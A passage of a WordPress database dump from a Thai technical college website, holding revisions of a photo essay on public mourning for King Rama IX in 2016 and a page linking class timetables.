class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-full\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-full\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-full\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-full\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-full\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-full\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-full\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-full\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-full\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-full\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-full\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 13:20:04', '2018-11-12 06:20:04', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4359, 3, '2018-11-12 13:23:48', '2018-11-12 06:23:48', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-full\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-full\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-full\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-full\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-full\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-full\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-full\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-full\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-full\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-full\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-full\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-full\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-full\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-full\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"675\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-full\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-full\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-full\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-full\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-full\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-full\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-full\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-full\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-full\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-full\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-full\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-full\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-full\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-full\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 13:23:48', '2018-11-12 06:23:48', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4360, 4, '2018-11-12 15:04:45', '2018-11-12 08:04:45', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\n\n<a href=\"https://drive.google.com/drive/folders/1s5ZqbV0gwdItaOdkYYP3lDPxM3v28r9D?usp=sharing\">ปีการศึกษา 2/2560 </a>\n\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\n\nปีการศึกษา 2/2561\n\n \n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\nปีการศึกษา 1/2560\n\nปีการศึกษา 2/2560\n\n<a href=\"https://drive.google.com/open?id=1k2WwLZlgy4YK8X6AnrNc_6iqkPYW87Ub\">ปีการศึกษา 1/2561</a>\n\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-autosave-v1', '', '', '2018-11-12 15:04:45', '2018-11-12 08:04:45', '', 1174, 'http://www.technicrayong.ac.th/1174-autosave-v1/', 0, 'revision', '', 0),
(4364, 3, '2018-11-12 13:48:46', '2018-11-12 06:48:46', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ 